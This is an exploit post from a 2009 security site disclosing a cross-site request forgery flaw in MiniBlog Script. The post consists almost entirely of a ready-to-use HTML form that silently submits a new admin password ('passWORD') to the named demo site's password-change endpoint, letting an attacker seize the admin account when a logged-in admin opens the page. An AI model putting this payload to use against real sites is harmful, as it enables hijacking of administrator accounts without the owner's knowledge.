MiniBlog ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > MiniBlog ~ XSRF Vuln.

Madde
	Author : Bug Researchers/BARCOD3
	Date : 04.11.2009 23:46:56
	# MiniBlog ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : MiniBlog Script # Vulnerable Type : XSRF # Infection : Admin Account password change edilebilir. # author : BARCOD3 - Bug Researchers # Demo : http://www.bpowerhouse.com/demos/miniblog/index.php?admin=login # Home : ozkanbozkurt.com ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <h3>BARCOD3</h3> <form action=’http://www.bpowerhouse.com/demos/miniblog/index.php?admin=password’ method=’post’> <input class=form_text name=password_one type=password size=15 maxlength=15 value=passWORD></td> <input class=form_text name=password_two type=password size=15 maxlength=15 value=passWORD></td> <input class=form_button type=submit name=submit value=Change password></td> </form> < -- bug code end of -- >